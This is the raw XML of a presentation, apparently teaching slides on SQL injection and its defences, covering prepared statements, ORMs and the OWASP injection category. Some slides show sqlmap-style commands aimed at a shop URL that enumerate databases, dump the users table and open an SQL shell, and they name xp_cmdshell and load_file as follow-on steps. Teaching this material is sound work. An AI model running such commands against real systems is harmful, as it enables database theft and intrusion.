            <a:ext cx="11034361" cy="283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2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62DB1A0-2092-4174-B4F5-9E30A67FA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91" y="0"/>
            <a:ext cx="8652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4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E3578B4-6FB8-42DC-AA70-C92BBC63C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75" y="153601"/>
            <a:ext cx="6996984" cy="263086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50CE82B-C4CC-48D9-8703-07FAA3E2F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76" y="2900005"/>
            <a:ext cx="7651248" cy="38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7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15CA995-0593-4154-8ACA-B1292864C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1" y="2032890"/>
            <a:ext cx="11021538" cy="249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0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5CC1772-1E4C-4A8A-9005-45C9A61B1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50" y="1511919"/>
            <a:ext cx="10912099" cy="34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4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3512220-ABFE-4498-9C30-2C13F267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9" y="839361"/>
            <a:ext cx="11143602" cy="517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8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481E4CE-BAA5-4D25-A7F6-D8B70917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6" y="1545277"/>
            <a:ext cx="10788008" cy="376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F3B4B8F-1D2F-4D32-B844-277EAB1A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77" y="1668487"/>
            <a:ext cx="10818046" cy="35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71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61E3ABC-7F70-4AAD-A142-341067E05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79" y="1680233"/>
            <a:ext cx="9502042" cy="349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50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4560F76-182C-4E06-8C45-6FC2621F4AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641178" y="384441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70168B1-494C-46AA-98B4-E99B2C6BA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1" y="132428"/>
            <a:ext cx="11961678" cy="376114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3E3F18E-1677-486F-87E9-08EB5A377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14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115161" y="4213745"/>
            <a:ext cx="11961678" cy="238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9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/>
              <a:t>Server and Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0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1095A26-AC52-43A0-A770-E3E06A5BC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44" y="1205834"/>
            <a:ext cx="10620511" cy="44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98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A17CFF-7DCC-4915-A783-B7DC2799F26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pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>if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application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so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>chatty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…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65039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621DE67-9694-4BF4-9E8A-F80C4E9DF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79" y="317683"/>
            <a:ext cx="6509721" cy="297861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A6CCDB4-9C04-428C-9F34-97F0943C6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579" y="3515626"/>
            <a:ext cx="6535364" cy="297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61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FA4C95E-706F-4FCC-B60E-B30D0AE4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3" y="1795712"/>
            <a:ext cx="11510074" cy="28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30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2B58ABE-E159-42A4-A8A7-7893AB395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91" y="1400575"/>
            <a:ext cx="10956817" cy="405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40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22088BE-0CD2-4B24-9C96-F426BB6B0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03" y="1389976"/>
            <a:ext cx="10874794" cy="407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01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1F7046D-0126-4F2C-BB72-5C0E0BA15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04" y="1560846"/>
            <a:ext cx="10739992" cy="373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76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3F742E5-E71B-4789-A9AB-EBC62CB33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83" y="1564105"/>
            <a:ext cx="10070433" cy="37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56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4084DAE-D571-4CF8-A090-C26F8D88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71" y="1571975"/>
            <a:ext cx="9945057" cy="371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24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62144AF-35BE-447C-8AC6-60CBF2A52549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302364" y="6023296"/>
            <a:ext cx="789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true if the first character of the first username equals "m"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5DC133-2C31-4FEA-912C-A13351EF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4" y="2099610"/>
            <a:ext cx="11777732" cy="26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9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47172" y="1276655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17" name="Rechteck 516">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6048A784-D831-4B4B-9022-AEF16F6913FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7484333" y="1344228"/>
            <a:ext cx="1528913" cy="1567552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX1" fmla="*/ 494349 w 1528913"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX2" fmla="*/ 958119 w 1528913"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX3" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX4" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY4" fmla="*/ 506842 h 1567552"/>
              <a:gd name="connsiteX5" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY5" fmla="*/ 998008 h 1567552"/>
              <a:gd name="connsiteX6" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY6" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX7" fmla="*/ 1019275 w 1528913"/>
              <a:gd name="connsiteY7" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX8" fmla="*/ 479059 w 1528913"/>
              <a:gd name="connsiteY8" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY9" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY10" fmla="*/ 1045035 h 1567552"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY11" fmla="*/ 538193 h 1567552"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 156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28913" h="1567552" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="151661" y="-564"/>
                  <a:pt x="281388" y="-15761"/>
                  <a:pt x="494349" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="707310" y="15761"/>
                  <a:pt x="858117" y="12664"/>
                  <a:pt x="958119" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1058121" y="-12664"/>
                  <a:pt x="1251707" y="20407"/>
                  <a:pt x="1528913" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1508124" y="246332"/>
                  <a:pt x="1514049" y="322357"/>
                  <a:pt x="1528913" y="506842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1543777" y="691327"/>
                  <a:pt x="1516040" y="788238"/>
                  <a:pt x="1528913" y="998008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1541786" y="1207778"/>
                  <a:pt x="1513652" y="1380199"/>
                  <a:pt x="1528913" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1332582" y="1569202"/>
                  <a:pt x="1148716" y="1589114"/>
                  <a:pt x="1019275" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="889834" y="1545990"/>
                  <a:pt x="725218" y="1549781"/>
                  <a:pt x="479059" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232900" y="1585323"/>
                  <a:pt x="211632" y="1561407"/>
                  <a:pt x="0" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25689" y="1416523"/>
                  <a:pt x="15740" y="1268661"/>
                  <a:pt x="0" y="1045035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15740" y="821409"/>
                  <a:pt x="-21984" y="783198"/>
                  <a:pt x="0" y="538193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21984" y="293188"/>
                  <a:pt x="-5209" y="156899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40" name="Rechteck 739">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561EC690-BEDA-4738-BD12-E80FA70B4028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9400292" y="2942110"/>
            <a:ext cx="2689712" cy="1639495"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX1" fmla="*/ 645531 w 2689712"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX2" fmla="*/ 1237268 w 2689712"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX3" fmla="*/ 1963490 w 2689712"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX4" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX5" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY5" fmla="*/ 530103 h 1639495"/>
              <a:gd name="connsiteX6" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY6" fmla="*/ 1043812 h 1639495"/>
              <a:gd name="connsiteX7" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY7" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX8" fmla="*/ 2017284 w 2689712"/>
              <a:gd name="connsiteY8" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX9" fmla="*/ 1425547 w 2689712"/>
              <a:gd name="connsiteY9" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX10" fmla="*/ 753119 w 2689712"/>
              <a:gd name="connsiteY10" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY11" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY12" fmla="*/ 1109392 h 1639495"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY13" fmla="*/ 579288 h 1639495"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 163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89712" h="1639495" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="318099" y="-10057"/>
                  <a:pt x="443311" y="23563"/>
                  <a:pt x="645531" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="847751" y="-23563"/>
                  <a:pt x="1081480" y="15055"/>
                  <a:pt x="1237268" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1393056" y="-15055"/>
                  <a:pt x="1795889" y="-18496"/>
                  <a:pt x="1963490" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2131091" y="18496"/>
                  <a:pt x="2479986" y="-21961"/>
                  <a:pt x="2689712" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696162" y="180679"/>
                  <a:pt x="2687426" y="360568"/>
                  <a:pt x="2689712" y="530103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2691998" y="699638"/>
                  <a:pt x="2683199" y="902862"/>
                  <a:pt x="2689712" y="1043812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696225" y="1184762"/>
                  <a:pt x="2663209" y="1513217"/>
                  <a:pt x="2689712" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2393214" y="1665711"/>
                  <a:pt x="2292966" y="1657445"/>
                  <a:pt x="2017284" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1741602" y="1621545"/>
                  <a:pt x="1550803" y="1654232"/>
                  <a:pt x="1425547" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300291" y="1624758"/>
                  <a:pt x="1066886" y="1641935"/>
                  <a:pt x="753119" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="439352" y="1637055"/>
                  <a:pt x="181735" y="1651193"/>
                  <a:pt x="0" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18391" y="1442982"/>
                  <a:pt x="9763" y="1253998"/>
                  <a:pt x="0" y="1109392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-9763" y="964786"/>
                  <a:pt x="8304" y="835575"/>
                  <a:pt x="0" y="579288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-8304" y="323001"/>
                  <a:pt x="-518" y="15253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7" grpId="0" animBg="1"/>
      <p:bldP spid="7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D54D02B-EE42-4263-BD8A-4CACDA29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4" y="2069582"/>
            <a:ext cx="11825831" cy="27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60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85D2D3E-7F5C-45CA-8A83-BBC5C590A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4" y="2086401"/>
            <a:ext cx="11825831" cy="268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99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5A509A2-51A9-4E71-B083-E0383113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2" y="2051472"/>
            <a:ext cx="11901396" cy="275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73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927D1D4-2AE6-461F-BF64-53DEEB3C2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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1937857"/>
            <a:ext cx="12192000" cy="29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49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A4CEF31-2FA4-446E-BDE3-16B51000D493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="939567"/>
            <a:ext cx="740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http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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9AF73FD-F97F-4467-B06E-3588EE26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09" y="1495554"/>
            <a:ext cx="3093135" cy="155411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BA17791-7925-4C6D-A3FE-D54218C638A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="3647005"/>
            <a:ext cx="1010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http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> --tables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CE8941-6018-4895-ADC5-30A4C0D44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9" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="4134251"/>
            <a:ext cx="2668864" cy="169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3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ECE2ABA2-597C-4BDC-8443-5576268C040E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="599703"/>
            <a:ext cx="1057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http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -T users --dump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A59CAE-7C7E-46CF-8FD4-D77440BC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40" y="1092729"/>
            <a:ext cx="7497481" cy="226007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3814680-6276-43DB-8D4C-325424000F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="3817035"/>
            <a:ext cx="10066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http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>...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C39DE5-0330-4865-AB42-07D3DDC89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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154640" y="5105213"/>
            <a:ext cx="6493915" cy="10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4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826935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5642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161784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Verbose / Blind (Time based) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>SQLi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6010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943521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Verbose / Blind (Time based) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>SQLi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Prepared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(e.g. ORMs)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7997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45DE994-02AE-4B91-99E3-CFBBC34B32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926732" y="1964371"/>
            <a:ext cx="10338536" cy="17100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99D0020-DB1C-4A14-B642-5E3918DF5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611" y="4038596"/>
            <a:ext cx="6900778" cy="2414752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E6E57A5B-5B0D-4511-A2EA-5E37AD77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Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1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4836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A1BF9A5-2910-40A4-8A09-83F0318D4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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900362" y="441434"/>
            <a:ext cx="6391275" cy="203358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CA0F0E-F318-4650-9966-7732CB589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1317239" y="2872443"/>
            <a:ext cx="10125075" cy="167475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9DFB444-7E27-4F0D-80C3-BFC84D3A0D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="96103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Select title, name,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from users where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 and password = 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';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" dirty="0"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96062D2-C6F2-4A88-BA88-353CE0553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160" y="5967452"/>
            <a:ext cx="21812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0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08C272E-B879-4659-A02F-A5997F6834D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319048" y="6492875"/>
            <a:ext cx="10815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dirty="0"/>
              <a:t>https://www.doctrine-project.org/projects/doctrine-orm/en/current/tutorials/getting-started.html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08DF019-DECD-4F75-AD35-C4C8D49C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15"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>ORM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Doctrine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>)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1BD4E5-5920-4A9F-B73D-B72389BDA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51" y="1410937"/>
            <a:ext cx="3710152" cy="50192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46219C5-A3AF-4ADB-81E7-144A70664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741" y="1410938"/>
            <a:ext cx="4763567" cy="42014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2C4C69B-9366-4362-BE8C-D07FEC59C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741" y="5864638"/>
            <a:ext cx="4763567" cy="3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94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Verbose / Blind (Time based) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>SQLi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Prepared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(e.g. ORMs)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A1:2017-Injection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7409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Verbose / Blind (Time based) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>SQLi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Prepared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(e.g. ORMs)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A1:2017-Injection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11673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B811F-576E-478C-A2F2-53B1ABB3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exploitation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3F531-D9BC-4541-B927-79A44E17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else you can do heavily depends on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query you’re injecting into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT, INSERT INTO, UPDATE, DELETE, EXEC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operating system and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reading / writing files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MySQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executing OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MS SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_servicecontrol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6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AB46A-0C10-497F-9D7C-D352809E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but gold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D1F855-9BA5-401E-9FA9-4F35DB8FE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90" y="2009510"/>
            <a:ext cx="9223220" cy="283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E7D3DA8-CCE2-45CB-9C48-C1FB2C440583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622800" y="5606534"/>
            <a:ext cx="294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b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://xkcd.com/327/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8ADB578-D42B-4AE9-B36E-D123AE859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157288"/>
            <a:ext cx="605790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85A050C-3E21-4D98-A6FB-F7BD2052D8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224867" y="6098957"/>
            <a:ext cx="403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https://9gag.com/gag/aBg8PLx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1498306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30EA98EE-412C-46E2-88B7-B7FCA3ADF276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077384"/>
            <a:ext cx="10198413" cy="243299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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>included</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> (backend) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>messes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>up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predefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="6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5324ED-6FA8-414B-8D1A-0CE5F9618E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551718" y="4389319"/>
            <a:ext cx="90885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you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think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any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other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context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mess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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="32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4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2A90FFD-AEB3-4A81-BE76-CA6338701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1" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979309" y="651231"/>
            <a:ext cx="6467475" cy="204032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DFCC7ED-EDDF-4A54-8C95-2BAD399699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812"/>
